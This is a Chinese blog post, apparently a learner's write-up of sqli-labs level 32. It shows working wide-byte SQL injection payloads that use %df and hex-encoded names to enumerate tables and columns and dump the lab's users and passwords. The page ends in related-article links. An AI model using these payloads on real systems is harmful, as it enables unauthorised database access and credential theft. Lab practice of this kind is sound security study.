宽字节注入

于 2024-04-08 14:10:07 发布
阅读量584 收藏 3
点赞数 14
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65835619/article/details/137500838
版权

理解一个内容,不光要从他的定义原理来说明,还要从一个实际的操作,加深记忆

目标sqlilabas第32关 

首先正常的访问页面,输入id=1,看页面的反应

继续输入id=1'  发现页面没有变化,说明代码把'注释掉了

利用16进制转换绕过,发现是存在注入的

后面就可以利用union联合查询了 id=-1%df' union select 1,database(),3--+

很简单的得到了数据库的名称security

因为注入内容里面存在引号就会被注释掉,那么直接把后面的名字直接转换成16进制的字符串,加上0x这样数据库就能识别,就选users表,查看users表的字段

id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479--+

下一步就是查询users表的数据(不一个个表和字段写了,随便写了一个)

id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 and table_schema=0x7365637572697479--+

字段也查出来了,现在可以查询users表的数据了

id=-1%df' union select 1,group_concat(id,username,password),3 from users--+

users表的数据
1DumbDumb,
2AngelinaI-kill-you,
3Dummyp@ssword,
4securecrappy,
5stupidstupidity,
6supermangenious,
7batmanmob!le,
8adminadmin,
9admin1admin1,
10admin2admin2,
11admin3admin3,
12dhakkandumbo,
14admin4admin4

其实后面的步骤都一样的,关键就是一定要记住在注入的时候尝试,以及0x16进制的使用,还有中和代码的注释%df

web渗透小白
关注
  • 14
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql sql字节注入_SQL注入字节注入
weixin_36173034的博客
02-07 355
About SQL Injection字节注入0x01 前言对于SQL注入,我估计搞安全的都玩的滚瓜烂熟了,搞站什么的都是分分钟来的,但是之前做了一道字节注入的题目,又打开了我一扇通往新世界的大门(PS:早都碰到过,只不过一直没有时间写)。0x02 字节和mysql单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码。多字节字符集: 在多字节字符集中,一部分字节用多个字节来...
字节注入原理分析
1stPeak's Blog
06-07 1万+
什么是字节? 如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为字节。 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的字节,也就是只有两字节 英文默认占一个字节,中文占两个字节 什么是字节注入? 原理: 字节注入是利用了mysql的一个特性,即mysql在使用GBK编码时,在url解码时会认为两个字符是一个汉字(前一个ASCII码要大于128,才表示到汉字的范围) 通常情况下,一个utf-8编码的汉子占用3个字节,一个GBK编
字节注入详解
热门推荐
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、字节已经常见字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
mysql字节注入_字节注入原理
weixin_30376627的博客
02-27 330
字节注入产生的原理字节注⼊源于程序员设置MySQL连接时错误配置为:set character_set_client=gbk,这样配置会引发编码转换从⽽导致的注⼊漏洞。具体原理如下:1,正常情况下当GPC开启或使⽤addslashes函数过滤GET或POST提交的参数时,⿊客使⽤的单引号 '就会被转义为:';2,但如果存在字节注⼊,我们输⼊%df%27时⾸先经过上⾯提到的单引号转义变成了%...
字节注入分析
qq_39511050的博客
09-11 1173
字节注入分析,sqli-labs less-33
SQL 字节注入详解
永远是少年
08-26 977
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper介绍。 一、字节编码与字节简介 二、字节注入原理 三、字节注入实战
13 字节注入1
08-03
字节注入攻击 字节注入攻击是一种常见的数据库安全漏洞,攻击者可以通过 inject恶意数据库查询语句来获得敏感信息或控制数据库。这种攻击方式通常发生在使用GBK编码的数据库中,攻击者可以使用字节注入来 ...
字节注入详解-附件资源
03-05
字节注入详解-附件资源
网络安全 字节注入 CMS网站渗透实战 学术交流
12-05
web安全初学者,跟着公开课学习了一段时间,第一次在靶场环境下,边查询边过关,请教了不少人,对blueCMS系统存在的字节注入漏洞成功进入后台,找到后台文件编写路径,写入一句话木马,通过蚁剑连接成功后,开始提...
第十九节 字节SQL注入-01
最新发布
09-15
字节注入代码分析 在字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
SQL注入漏洞攻击
10-01
SQL注入漏洞攻击 防范SQL注入漏洞攻击的方法,不使用SQL语句拼接,通过参数赋值
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
sql注入系列课程
06-11
3. **不同类型的SQL注入**:课程将涵盖不同类型的SQL注入,如盲注、堆叠注入字节注入等,每种都有其独特的利用方式和应对策略。 4. **服务器权限获取**:在高级阶段,课程可能会介绍如何通过SQL注入进一步获取...
mysql练习注入语句
01-21
这里,我们将学习 MySQL 的一些基本知识点,包括MySQL数据库函数、布尔盲注语句、时间盲注语句、字节注入、黑名单和白名单等。 一、MySQL数据库函数 MySQL提供了许多有用的函数,可以帮助我们更好地管理和操作...
Web安全SQL注入精讲视频.zip
04-16
目录网盘文件永久链接 1-1 SQL注入的业务场景以及危害.mp4 1-2 真实网站中的SQL注入是怎么样的.mp4 1-3 SQL为什么有那么多分类.mp4 ...3-5 字节注入.mp4 3-6 过滤函数绕过(综合实验).mp4 4-1SQL注入防御.mp4
sql injection(SQL注入)教程
10-25
除此之外,还有**字节注入**,主要针对处理字符集(如GBK)的系统,通过特殊编码序列来绕过过滤机制。**DNSLog注入**则是将查询结果写入DNS查询,通过监视DNS流量来获取数据。 最后,**SQL注入写入Webshell**是...
SXU-网络攻防第六次作业-sql注入进阶
12-27
本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入、堆叠注入字节注入,并给出相应的实践步骤。 首先,我们来看报错注入。报错注入是通过触发数据库错误来揭示敏感信息...
基于SQL注入的攻击与预防.docx
09-07
7. 字节注入:这种攻击方式通过注入恶意的 Unicode 字符,来控制数据库的行为。 三、SQL 注入攻击的危害 SQL 注入攻击可以导致以下几种危害: 1. 数据泄露:攻击者可以读取或修改敏感数据,导致数据泄露。 2. ...
sql注入字节注入
07-28
SQL注入字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权的数据库操作。这可能导致数据泄露、数据篡改、绕过认证、获取系统权限等问题。 预防SQL注入的措施包括: - 使用参数化查询或预编译语句来处理数据库查询,而不是直接拼接用户输入的数据。 - 对用户输入进行严格的验证和过滤,避免将未经处理的输入直接传递给数据库查询。 - 最小化数据库用户的权限,并且仅分配最低必要的权限。 2. 字节注入字节注入是一种特定于某些数据库和编码方式的注入攻击方法。它利用了某些编码方式对特殊字符的处理不当,从而绕过了应用程序对输入进行过滤和验证的机制。攻击者可以通过插入字节字符来篡改SQL语句或绕过认证。 预防字节注入的措施包括: - 使用合适的编码方式,例如UTF-8,以避免特殊字符被误解释。 - 进行输入验证和过滤,确保特殊字符被正确处理,不会导致SQL语句的非预期解析。 - 定期更新数据库和应用程序框架,以修复已知的字节注入漏洞。 总的来说,要防止SQL注入字节注入等安全漏洞,应该采取综合性的安全措施,包括输入验证、参数化查询、最小权限原则、使用最新版本的软件以及定期进行安全审计和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值